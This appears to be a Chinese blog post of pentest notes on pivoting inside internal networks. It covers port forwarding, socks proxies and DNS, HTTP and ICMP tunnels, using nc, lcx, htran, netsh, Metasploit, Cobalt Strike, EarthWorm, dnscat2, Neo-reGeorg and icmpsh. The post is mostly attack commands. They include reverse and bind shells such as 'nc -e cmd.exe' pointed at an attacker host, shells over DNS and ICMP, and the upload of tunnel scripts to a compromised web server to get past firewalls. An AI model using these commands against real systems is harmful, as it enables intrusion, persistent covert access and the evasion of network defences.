内网端口转发小技巧

端口转发

NC

反向连接
  • kali开启监听

    nc -lnvp 7777

在这里插入图片描述

  • 目标返向连接

    nc -e cmd.exe 192.168.95.128 7777

在这里插入图片描述

  • 可以执行命令

在这里插入图片描述

正向连接
  • 目标开启监听

    nc -l -p 5555 -e cmd.exe

  • kali连接

    nc -nvv 192.168.95.12 5555

  • 执行命令

在这里插入图片描述

lcx

外网无法访问内网,但内网可访问外网
  • client:转发自己的3389端口到远程端口7777上

    lcx.exe -slave rhost rport(7777) lhost lport(3389)

在这里插入图片描述

  • attack: 转发本地的7777端口到5555上

    portmap -m 2 -p1 7777 -p2 5555

    我的kali跑不了

  • 连接本地的5555端口:即可实现监听目标的3389

    rdesktop 127.0.0.1:5555

转发内网端口

lcx.exe -tran lport(7777) rhost(192.168.93.10) rport(3389)

rdesktop 192.168.0.106:7777

端口转发 + 绕过防火墙

3389转到53端口上,attack连接53端口
lcx.exe -tran lport lhost lport rdesktop rhost 53

netsh

windows自带规则配置工具

  • 添加一条规则:将远程的3389端口转发到本地的7777端口上

    netsh interface portproxy add v4tov4 listenport=7777 connect=3389 connectaddress=192.168.93.10 protocol=tcp
    
  • 查看转发规则:netsh interface portproxy dump

  • 删除转发规则:netsh interface portproxy delete v4tov4 listenport=7777

htran

绕过防火墙
  • 方法1:htran.exe -p -tran lport lhost lport

  • 方法2:htran.exe -p -slave rhost rport lhost lport portmap -m 2 -p1 xxxx -p2 xxxx

转发内网端口
  • 方法1:htran.exe -p -tran lport rhost rport

  • 方法2:

    将本地(win2012)的3389转发到目标(win2008)的7777上

    htran.exe -p -slave rhost(192.168.93.20) rport(7777) lhost(127.0.0.1) lport(3389)

    在目标上(win2008)监听本地7777端口,转发到9999端口htran.exe -p -listen 7777 9999

    attack 连接(win2008)9999端口,相当于连接了win2012的3389:rdesktop 192.168.0.106:9999

socat

  • 转发内网端口

    socket.exe TCP4-LISTEN:5555.reuseaddr.fork TCP4:192.168.93.10:3389

FPipe

  • 转发内网端口
    FPipe.exe -l lport -r rport rhost -v

portfwd

msf自带

  • 生成一个监听
  • portfwd add -l 1389 -r 192.168.93.10 -p 3389
  • 查看已建立的规则: portfwd list
  • 连接:rdesktop 192.168.0.108:1389 (此处是msf的地址)

cobalt strike

  • cs生成一个客户端,将其拿到目标机器是上运行,拿到一个会话

  • 然后进入交互模式

    rportfwd 8888 rhost 3389

    rportfwd stop 8888

rinetd

linux自带的一个文件,位于/etc/rinetd

  • 当外部主机是linux时,可使用其进行转发操作
    lhost lport rhost rport

ngrock

网络代理

socks代理

cobaltstrike
msf
  • 添加路由:run post/multi/manage/autoroute
  • 查看路由:run autoroute -p
  • 添加socks代理:use auxiliary/server/socks4a
  • 使用代理链工具调用代理:proxychains rdesktop 192.168.93.10
ew
  • 正向代理
  • 用法B(08):ew_win32.exe -s ssocksd -l 1080
    • 流量走向:A <··> B:1080 <··> C
  • 反向代理
    • win08本地流量转发:ew_win32.exe -s rssocks -l 1080 -e 8888
    • win12转发自身流量到08的8888端口:ew_win32.exe -s rssocks -d 192.168.93.20 -e 8888
      • kali连接:proxychains rdesktop 192.168.93.10
    • 流量走向:A(kali) <··> B(08):1080 <··> B:8888 <··>C(12)
    • 端口转发
Termite(白蚁)
  • 添加代理:socks 1080
  • 反弹一个shell:shell 7777

DNS代理

dnscat2
  • 服务端执行:ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.0.108" --no-cache
  • 客户端连接:dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108
    • 操作
    • 查看所有的会话:windows
      • 与指定会话交互:session -i
    • 得到一个shell:shell
      • 转到主界面:ctrl+z
iodine

备选,遇linux主机可一试

  • 服务端执行:iodined -p 123456 -f -DD 192.168.0.108 abc.com
  • 客户端:iodine -p 123456 -f -r -T TXT 192.168.0.108 abc.com

HTTP代理

ReDuh(不太好用)

java -jar reDuhClient.jar http://192.168.0.108/reduh.jsp

nc -w localhost 1010

[create Tunnel]1234:127.0.0.1:3389

Tunna
  • 把代理脚本上传到目标服务器,然后通过代理内网的某个端口,将敏感端口流量转发了外网的的某个端口,再通过本地连接外网的端口进行连接。
  1. 将代理脚本上传到目标服务器,在浏览器访问代理脚本是否被解析
  2. python proxy.py -u http://192.168.0.108/conn.php -l 4444 -r 3389 -s -v --no-socks
  3. 本地执行:rdesktop 127.0.0.1:4444
reGeorg
  • Neo-reGeorg (支持客户端的加密)

    • 设置密码并生成隧道文件:python neoreg py generate -k Scantime
  • 将隧道文件放到目标服务器的web目录,连接web服务器并建立本地socks代理:python neoreg.py -k scantime -u http://192.168.0.108/tunnel.php

    • Socks连接工具连接本地

ICMP代理

  • 运行前执行:sysctl -w net.ipv4.icmp_echo_ignore_all=1

  • 服务端:icmpsh_m.py lhost rhost

    • 客户端:icmpsh.exe -t serverhost
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值